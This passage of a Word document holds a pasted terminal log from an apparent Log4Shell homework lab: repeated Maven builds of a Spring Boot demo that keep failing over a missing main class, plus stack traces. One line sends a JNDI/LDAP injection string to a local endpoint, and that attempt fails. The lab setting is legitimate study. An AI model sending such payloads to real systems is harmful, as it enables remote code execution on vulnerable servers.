    <w:p w14:paraId="0C889E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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/2.1/plexus-archiver-2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703803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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/2.1/plexus-archiver-2.1.pom (2.8 kB at 134 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF3FB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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/2.0.2/plexus-io-2.0.2.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0C93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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/2.0.2/plexus-io-2.0.2.pom (1.7 kB at 83 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0375A8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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.19/plexus-components-1.1.19.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E0D4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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.1.19/plexus-components-1.1.19.pom (2.7 kB at 123 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734E46E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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.15/plexus-interpolation-1.15.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D02E98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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.15/plexus-interpolation-1.15.pom (1.0 kB at 46 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C4CEC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https://repo.maven.apache.org/maven2/commons-lang/commons-lang/2.1/commons-lang-2.1.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003CBA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https://repo.maven.apache.org/maven2/commons-lang/commons-lang/2.1/commons-lang-2.1.pom (9.9 kB at 397 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34CF5C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https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1-alpha-2/classworlds-1.1-alpha-2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121950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https://repo.maven.apache.org/maven2/org/apache/maven/maven-archiver/2.5/maven-archiver-2.5.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703B18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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.15/plexus-interpolation-1.15.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262EC9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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/2.1/plexus-archiver-2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C07D5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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/2.0.2/plexus-io-2.0.2.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039BA9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https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1-alpha-2/classworlds-1.1-alpha-2.jar (38 kB at 1.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B610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https://repo.maven.apache.org/maven2/commons-lang/commons-lang/2.1/commons-lang-2.1.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B5C9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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.15/plexus-interpolation-1.15.jar (60 kB at 1.6 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D11FAB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https://repo.maven.apache.org/maven2/org/apache/maven/maven-archiver/2.5/maven-archiver-2.5.jar (22 kB at 559 kB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CB63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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/2.0.2/plexus-io-2.0.2.jar (58 kB at 2.2 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A46C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https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-archiver/2.1/plexus-archiver-2.1.jar (184 kB at 4.7 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDB99D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https://repo.maven.apache.org/maven2/commons-lang/commons-lang/2.1/commons-lang-2.1.jar (208 kB at 5.1 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA8CA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[WARNING] JAR will be empty - no content was marked for inclusion!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19707FF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jar: /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE8CA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7CAB29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 SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D76C0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5FB2975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Total time:  6.899 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61652F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Finished at: 2025-05-28T23:14:57Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D6CA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2817979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java -jar target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2025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no main manifest attribute, in target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68478FD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clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6650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1C38669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AC41C2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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1077C1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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4FEF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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E93014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8A480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maven-clean-plugin:2.5:clean (default-clean) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DC86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Deleting /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1B61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51848C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maven-resources-plugin:2.6:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650C3B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[WARNING] Using platform encoding (UTF-8 actually) to copy filtered resources, i.e. build is platform dependent!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214C66B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0B0D87F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212526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maven-compiler-plugin:3.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293D49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2F49CC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D46C8E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maven-resources-plugin:2.6:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F954F7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[WARNING] Using platform encoding (UTF-8 actually) to copy filtered resources, i.e. build is platform dependent!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E160E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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3DCE2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11A76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maven-compiler-plugin:3.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4B642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2A4DAD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010965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maven-surefire-plugin:2.12.4:test (default-test) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6074A7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tests to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76493A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25158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maven-jar-plugin:2.4:jar (default-jar) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B863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[WARNING] JAR will be empty - no content was marked for inclusion!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCCD1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jar: /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358F07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B1423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spring-boot-maven-plugin:2.5.5:repackage (default) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EABFF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076DE7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 FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4B21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435CE8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Total time:  2.643 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E49A8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Finished at: 2025-05-28T23:17:10Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC288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2406B9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Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage (default) on project log4shell-demo: Execution default of goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:repackage failed: Unable to find main class -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F5F1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[ERROR]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6639DE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To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5529BE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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8017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7616CD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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D8B3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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/PluginExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6C0E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clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6596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134E2F7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97EB1B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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7434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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2107A67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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8944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5624EB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maven-clean-plugin:2.5:clean (default-clean) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615BD2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Deleting /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB12A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9BA47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maven-resources-plugin:2.6:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A520E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[WARNING] Using platform encoding (UTF-8 actually) to copy filtered resources, i.e. build is platform dependent!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590863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31D828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CA5B1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maven-compiler-plugin:3.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9E4D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531F941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D8257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maven-resources-plugin:2.6:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C548B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[WARNING] Using platform encoding (UTF-8 actually) to copy filtered resources, i.e. build is platform dependent!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227BDF2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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052D611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8F3965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maven-compiler-plugin:3.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DB44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3DD7F66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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211451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maven-surefire-plugin:2.12.4:test (default-test) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239A33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tests to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC2E21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686989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maven-jar-plugin:2.4:jar (default-jar) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BF07D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[WARNING] JAR will be empty - no content was marked for inclusion!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429B99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jar: /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6655A1B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7E2931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 SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D65CDB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1592C0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Total time:  1.800 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FA42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Finished at: 2025-05-28T23:20:26Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C68E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6C5880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java -jar target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A56268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no main manifest attribute, in target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76104E8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clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA149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489A8AF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https://repo.maven.apache.org/maven2/org/springframework/boot/spring-boot-starter-parent/$%7Bspring.boot.version%7D/spring-boot-starter-parent-$%7Bspring.boot.version%7D.pom</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD1A8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[ERROR] Some problems were encountered while processing the POMs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65318C6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[FATAL] Non-resolvable parent POM for com.example:log4shell-demo:0.0.1-SNAPSHOT: Could not find artifact org.springframework.boot:spring-boot-starter-parent:pom:${spring.boot.version} in central (https://repo.maven.apache.org/maven2) and 'parent.relativePath' points at no local POM @ line 23, column 13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E31D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C012D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The build could not read 1 project -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542C03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379E9D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The project com.example:log4shell-demo:0.0.1-SNAPSHOT (/home/ec2-user/log4shell-homework/pom.xml) has 1 error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0AE0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Non-resolvable parent POM for com.example:log4shell-demo:0.0.1-SNAPSHOT: Could not find artifact org.springframework.boot:spring-boot-starter-parent:pom:${spring.boot.version} in central (https://repo.maven.apache.org/maven2) and 'parent.relativePath' points at no local POM @ line 23, column 13 -&gt; [Help 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5EEFC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[ERROR]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1420FD2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To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509BCD6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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0423D0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6CF9B7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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430026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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/ProjectBuildingException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C82C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[Help 2] http://cwiki.apache.org/confluence/display/MAVEN/UnresolvableModelException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556BC69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java -jar target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AE23C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no main manifest attribute, in target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9EBD5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clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD19F3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0DD61C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6A116A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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393127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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD353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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3840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C18F6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maven-clean-plugin:3.1.0:clean (default-clean) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B04E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Deleting /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB554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096BCF4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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FB3A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4BEDB5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794F0D2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68B84D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018CEFE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6DC99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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280B1D7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4D75BB2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898A3D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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D3205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 Using 'UTF-8' encoding to copy filtered resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088D69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341FB0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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC46F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0EDEC2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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1288991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1D64C3F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DBDD92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maven-surefire-plugin:2.22.2:test (default-test) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374191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tests to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6972FD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B7980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maven-jar-plugin:3.2.0:jar (default-jar) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4D2F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[WARNING] JAR will be empty - no content was marked for inclusion!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F231A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jar: /home/ec2-user/log4shell-homework/target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B066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5A4D86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spring-boot-maven-plugin:2.5.5:repackage (repackage) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B25EE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Replacing main artifact with repackaged archive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2933A7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3DAF09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 SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF994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47C4C4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Total time:  3.233 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B750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Finished at: 2025-05-28T23:27:47Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAADC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0ECF0F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java -jar target/log4shell-demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389E4C4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Exception in thread "main" java.lang.ClassNotFoundException: com.example.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE0C54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java.base/java.net.URLClassLoader.findClass(URLClassLoader.java:445)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FC7F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java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:592)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A686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org.springframework.boot.loader.LaunchedURLClassLoader.loadClass(LaunchedURLClassLoader.java:151)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4476877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java.base/java.lang.ClassLoader.loadClass(ClassLoader.java:525)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123720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java.base/java.lang.Class.forName0(Native Method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E55F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at java.base/java.lang.Class.forName(Class.java:467)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6586FB2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org.springframework.boot.loader.MainMethodRunner.run(MainMethodRunner.java:46)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065DAE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org.springframework.boot.loader.Launcher.launch(Launcher.java:108)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F3D2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org.springframework.boot.loader.Launcher.launch(Launcher.java:58)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF0A9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org.springframework.boot.loader.JarLauncher.main(JarLauncher.java:88)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A217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curl -X POST http://localhost:8080/log -d '${jndi:ldap://host.docker.internal:389/a}'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626742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curl: (7) Failed to connect to localhost port 8080 after 0 ms: Couldn't connect to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E72AC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spring-boot:run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003FE2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2DEB43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59618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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A46F6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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5BC0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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E012A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DD3031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&gt;&gt;&gt; spring-boot-maven-plugin:2.5.5:run (default-cli) &gt; test-compile @ log4shell-demo &gt;&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232B3B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CA271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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED9EAC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5910C9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741130B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5285C3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70ABDC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0C38EF6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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4434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769672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04A1D9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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501C24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62C203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48197A1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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146C8B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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232DF0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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345FDF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5CFD8B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05CB956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&lt;&lt;&lt; spring-boot-maven-plugin:2.5.5:run (default-cli) &lt; test-compile @ log4shell-demo &lt;&lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2FBF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8CDA4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43598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spring-boot-maven-plugin:2.5.5:run (default-cli) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572D84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Attaching agents: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0853238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Could not find or load main class com.example.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788752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Caused by: java.lang.ClassNotFoundException: com.example.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6A66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5EFA215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 FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDE628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3A7666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Total time:  2.355 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4A02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Finished at: 2025-05-28T23:32:22Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11518D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00BAE2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Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:run (default-cli) on project log4shell-demo: Application finished with exit code: 1 -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8A2C2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7BCB9F8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To see the full stack trace of the errors, re-run Maven with the -e switch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB372C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Re-run Maven using the -X switch to enable full debug logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7846A95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49DB23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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F96E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[Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A10139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spring-boot:run -e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CC56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Error stacktraces are turned on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B234E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148673D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0515D62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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C50C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 Building log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F74DA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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F06B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526AFD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&gt;&gt;&gt; spring-boot-maven-plugin:2.5.5:run (default-cli) &gt; test-compile @ log4shell-demo &gt;&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9B8E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03A3F6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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442295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7DC6A99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496551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4EFD7C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6DA107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5599E8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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7C4C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179F43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53F2988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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD19A5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301A5FF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7EE012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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7540B8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EFF38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maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30392C2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1C5EC4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A9248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&lt;&lt;&lt; spring-boot-maven-plugin:2.5.5:run (default-cli) &lt; test-compile @ log4shell-demo &lt;&lt;&lt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EBDD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6BACC8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5E9696B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spring-boot-maven-plugin:2.5.5:run (default-cli) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522023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Attaching agents: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3610E4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Could not find or load main class com.example.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41100D3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Caused by: java.lang.ClassNotFoundException: com.example.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD8AF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 ------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C939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 FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C2A1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45AC89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Total time:  2.293 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072C0EB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Finished at: 2025-05-28T23:35:21Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403C80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6C0B63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Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:run (default-cli) on project log4shell-demo: Application finished with exit code: 1 -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF6E6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org.apache.maven.lifecycle.LifecycleExecutionException: Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:run (default-cli) on project log4shell-demo: Application finished with exit code: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F955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(MojoExecutor.java:215)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4EE1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(MojoExecutor.java:156)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263D5A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(MojoExecutor.java:148)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACC46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org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject (LifecycleModuleBuilder.java:117)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C17F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org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject (LifecycleModuleBuilder.java:81)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5359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org.apache.maven.lifecycle.internal.builder.singlethreaded.SingleThreadedBuilder.build (SingleThreadedBuilder.java:56)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB01F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org.apache.maven.lifecycle.internal.LifecycleStarter.execute (LifecycleStarter.java:128)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC0835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org.apache.maven.DefaultMaven.doExecute (DefaultMaven.java:305)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7B7D3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org.apache.maven.DefaultMaven.doExecute (DefaultMaven.java:192)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7F94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org.apache.maven.DefaultMaven.execute (DefaultMaven.java:105)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6928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org.apache.maven.cli.MavenCli.execute (MavenCli.java:972)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203D475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org.apache.maven.cli.MavenCli.doMain (MavenCli.java:293)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E644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org.apache.maven.cli.MavenCli.main (MavenCli.java:196)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DBB41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jdk.internal.reflect.NativeMethodAccessorImpl.invoke0 (Native Method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249863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jdk.internal.reflect.NativeMethodAccessorImpl.invoke (NativeMethodAccessorImpl.java:77)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051E64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jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke (DelegatingMethodAccessorImpl.java:43)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A122C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java.lang.reflect.Method.invoke (Method.java:569)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26475B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org.codehaus.plexus.classworlds.launcher.Launcher.launchEnhanced (Launcher.java:282)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9E96E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org.codehaus.plexus.classworlds.launcher.Launcher.launch (Launcher.java:225)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510FBC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at org.codehaus.plexus.classworlds.launcher.Launcher.mainWithExitCode (Launcher.java:406)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BCE81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org.codehaus.plexus.classworlds.launcher.Launcher.main (Launcher.java:347)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61204D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Caused by: org.apache.maven.plugin.MojoExecutionException: Application finished with exit code: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F56ED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org.springframework.boot.maven.RunMojo.runWithForkedJvm (RunMojo.java:101)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D96A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org.springframework.boot.maven.AbstractRunMojo.doRunWithForkedJvm (AbstractRunMojo.java:286)</w:t>
      </w:r>
    </w:p>
